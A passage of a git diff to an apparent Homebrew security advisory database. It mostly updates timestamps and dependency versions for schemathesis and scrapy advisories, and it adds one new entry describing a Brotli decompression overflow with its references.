"upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-schemathesis-CVE-2026-45409.json b/advisories/BREW-schemathesis-CVE-2026-45409.json index 64a90c551b8..6e23c0566fc 100644 --- a/advisories/BREW-schemathesis-CVE-2026-45409.json +++ b/advisories/BREW-schemathesis-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2026-45409", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-schemathesis-CVE-2026-48710.json b/advisories/BREW-schemathesis-CVE-2026-48710.json index d3df9050daa..8061351d9b6 100644 --- a/advisories/BREW-schemathesis-CVE-2026-48710.json +++ b/advisories/BREW-schemathesis-CVE-2026-48710.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2026-48710", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-86qp-5c8j-p5mr", "CVE-2026-48710", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.0.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2026-48817.json b/advisories/BREW-schemathesis-CVE-2026-48817.json index 6b0fd4355b8..0a937158c0e 100644 --- a/advisories/BREW-schemathesis-CVE-2026-48817.json +++ b/advisories/BREW-schemathesis-CVE-2026-48817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2026-48817", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-x746-7m8f-x49c", "CVE-2026-48817", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.1.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2026-48818.json b/advisories/BREW-schemathesis-CVE-2026-48818.json index 7bb488d1439..f1f6c2eda40 100644 --- a/advisories/BREW-schemathesis-CVE-2026-48818.json +++ b/advisories/BREW-schemathesis-CVE-2026-48818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2026-48818", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-wqp7-x3pw-xc5r", "CVE-2026-48818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.1.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2026-54282.json b/advisories/BREW-schemathesis-CVE-2026-54282.json index e98a63cf553..f1e2e6885c9 100644 --- a/advisories/BREW-schemathesis-CVE-2026-54282.json +++ b/advisories/BREW-schemathesis-CVE-2026-54282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2026-54282", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-jp82-jpqv-5vv3", "CVE-2026-54282", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2026-54283.json b/advisories/BREW-schemathesis-CVE-2026-54283.json index 32166062b92..156bd4530fa 100644 --- a/advisories/BREW-schemathesis-CVE-2026-54283.json +++ b/advisories/BREW-schemathesis-CVE-2026-54283.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2026-54283", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-82w8-qh3p-5jfq", "CVE-2026-54283", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-scoutsuite-CVE-2026-59939.json b/advisories/BREW-scoutsuite-CVE-2026-59939.json index eab50f99e75..87ec92fd8e2 100644 --- a/advisories/BREW-scoutsuite-CVE-2026-59939.json +++ b/advisories/BREW-scoutsuite-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scoutsuite-CVE-2026-59939", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-scrapy-CVE-2013-4314.json b/advisories/BREW-scrapy-CVE-2013-4314.json index 181a75bc25c..3c6918f11b3 100644 --- a/advisories/BREW-scrapy-CVE-2013-4314.json +++ b/advisories/BREW-scrapy-CVE-2013-4314.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2013-4314", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-6748-36qp-fx6r", "CVE-2013-4314", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.13.1", "resource": "pyopenssl", - "resource_purl": "pkg:pypi/pyopenssl@26.3.0" + "resource_purl": "pkg:pypi/pyopenssl@26.4.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" } ] diff --git a/advisories/BREW-scrapy-CVE-2014-3146.json b/advisories/BREW-scrapy-CVE-2014-3146.json index 65f506743c4..3b3f9afcdba 100644 --- a/advisories/BREW-scrapy-CVE-2014-3146.json +++ b/advisories/BREW-scrapy-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2014-3146", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.3.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-scrapy-CVE-2017-14158.json b/advisories/BREW-scrapy-CVE-2017-14158.json index 5aa5e75de75..a9f10507674 100644 --- a/advisories/BREW-scrapy-CVE-2017-14158.json +++ b/advisories/BREW-scrapy-CVE-2017-14158.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2017-14158", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "CVE-2017-14158", "GHSA-h7wm-ph43-c39p", @@ -40,22 +40,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", @@ -67,15 +67,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "upstream:https://github.com/scrapy/scrapy" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "upstream:pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "upstream:pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", diff --git a/advisories/BREW-scrapy-CVE-2018-1000807.json b/advisories/BREW-scrapy-CVE-2018-1000807.json index 298a7695c2a..4292895a863 100644 --- a/advisories/BREW-scrapy-CVE-2018-1000807.json +++ b/advisories/BREW-scrapy-CVE-2018-1000807.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2018-1000807", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-p28m-34f6-967q", "CVE-2018-1000807", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "17.5.0", "resource": "pyopenssl", - "resource_purl": "pkg:pypi/pyopenssl@26.3.0" + "resource_purl": "pkg:pypi/pyopenssl@26.4.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" } ] diff --git a/advisories/BREW-scrapy-CVE-2018-1000808.json b/advisories/BREW-scrapy-CVE-2018-1000808.json index 854ecafa94d..72e6d9b8a76 100644 --- a/advisories/BREW-scrapy-CVE-2018-1000808.json +++ b/advisories/BREW-scrapy-CVE-2018-1000808.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2018-1000808", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-2rcm-phc9-3945", "CVE-2018-1000808", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "17.5.0", "resource": "pyopenssl", - "resource_purl": "pkg:pypi/pyopenssl@26.3.0" + "resource_purl": "pkg:pypi/pyopenssl@26.4.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" } ] diff --git a/advisories/BREW-scrapy-CVE-2018-19787.json b/advisories/BREW-scrapy-CVE-2018-19787.json index b0353bdd940..93eaeaff4e3 100644 --- a/advisories/BREW-scrapy-CVE-2018-19787.json +++ b/advisories/BREW-scrapy-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2018-19787", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.2.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-scrapy-CVE-2020-27783.json b/advisories/BREW-scrapy-CVE-2020-27783.json index 7aedc5c378f..7891d02dfed 100644 --- a/advisories/BREW-scrapy-CVE-2020-27783.json +++ b/advisories/BREW-scrapy-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2020-27783", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.2", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-scrapy-CVE-2020-36846.json b/advisories/BREW-scrapy-CVE-2020-36846.json new file mode 100644 index 00000000000..50cec6d2abb --- /dev/null +++ b/advisories/BREW-scrapy-CVE-2020-36846.json @@ -0,0 +1,177 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-scrapy-CVE-2020-36846", + "published": "2026-08-22T09:33:04Z", + "modified": "2026-08-22T09:33:04Z", + "upstream": [ + "GHSA-5v8v-66v8-mwm7", + "BIT-brotli-2020-8927", + "BIT-dotnet-2020-8927", + "BIT-dotnet-sdk-2020-8927", + "BIT-powershell-2020-8927", + "CVE-2020-36846", + "CVE-2020-8927", + "GO-2025-3726", + "PYSEC-2020-29", + "RUSTSEC-2021-0131", + "RUSTSEC-2021-0132" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "scrapy", + "purl": "pkg:brew/scrapy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.18.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.0.8", + "resource": "brotli", + "resource_purl": "pkg:pypi/brotli@1.2.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "brotli", + "subject_version": "1.2.0", + "key": "pkg:pypi/brotli@1.2.0", + "resource": "brotli" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "brotli", + "subject_version": "1.2.0", + "key": "pkg:pypi/brotli@1.2.0", + "resource": "brotli" + } + ] + }, + "summary": "Integer overflow in the bundled Brotli C library", + "details": "A buffer overflow exists in the Brotli library versions prior to 1.0.8 where an attacker controlling the input length of a \"one-shot\" decompression request to a script can trigger a crash, which happens when copying over chunks of data larger than 2 GiB. It is recommended to update your Brotli library to 1.0.8 or later. If one cannot update, we recommend to use the \"streaming\" API as opposed to the \"one-shot\" API, and impose chunk size limits.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8927" + }, + { + "type": "WEB", + "url": "https://github.com/bitemyapp/brotli2-rs/issues/45" + }, + { + "type": "WEB", + "url": "https://github.com/github/advisory-database/issues/785" + }, + { + "type": "WEB", + "url": "https://github.com/google/brotli/commit/223d80cfbec8fd346e32906c732c8ede21f0cea6" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2020/dsa-4801" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4568-1" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2021-0132.html" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2021-0131.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXEQ3GQVELA2T4HNZG7VPMS2HDVXMJRG" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WW62OZEY2GHJL4JCOLJRBSRETXDHMWRK" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W23CUADGMVMQQNFKHPHXVP7RPZJZNN6I" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQLM7ABVCYJLF6JRPF3M3EBXW63GNC27" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMBKACMLSRX7JJSKBTR35UOEP2WFR6QP" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4VCDOJGL6BK3HB4XRD2WETBPYX2ITF6" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J4E265WKWKYMK2RYYSIXBEGZTDY5IQE6" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4TOGTZ2ZWDH662ZNFFSZVL3M5AJXV6JF" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/356JOYTWW4BWSZ42SEFLV7NYHL3S3AEH" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00003.html" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/brotli/PYSEC-2020-29.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/google/brotli/releases/tag/v1.0.9" + }, + { + "type": "WEB", + "url": "https://github.com/google/brotli/releases/tag/v1.0.8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/bitemyapp/brotli2-rs" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00108.html" + } + ] +} diff --git a/advisories/BREW-scrapy-CVE-2021-28957.json b/advisories/BREW-scrapy-CVE-2021-28957.json index 16ede9fa648..17af9c57fbc 100644 --- a/advisories/BREW-scrapy-CVE-2021-28957.json +++ b/advisories/BREW-scrapy-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2021-28957", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.3", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-scrapy-CVE-2021-41125.json b/advisories/BREW-scrapy-CVE-2021-41125.json index 125c92353ea..a885b5e68e2 100644 --- a/advisories/BREW-scrapy-CVE-2021-41125.json +++ b/advisories/BREW-scrapy-CVE-2021-41125.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2021-41125", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "CVE-2021-41125", "GHSA-jwqp-28gf-p498", @@ -44,29 +44,29 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", @@ -78,15 +78,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "upstream:https://github.com/scrapy/scrapy" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "upstream:pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "upstream:pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", diff --git a/advisories/BREW-scrapy-CVE-2021-43818.json b/advisories/BREW-scrapy-CVE-2021-43818.json index 4b5a83de921..89f3b89b9c2 100644 --- a/advisories/BREW-scrapy-CVE-2021-43818.json +++ b/advisories/BREW-scrapy-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2021-43818", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-scrapy-CVE-2022-0577.json b/advisories/BREW-scrapy-CVE-2022-0577.json index d7eb56396b5..063bb4fc4dc 100644 --- a/advisories/BREW-scrapy-CVE-2022-0577.json +++ b/advisories/BREW-scrapy-CVE-2022-0577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2022-0577", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "CVE-2022-0577", "GHSA-cjvr-mfj7-j4j8", @@ -44,29 +44,29 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": 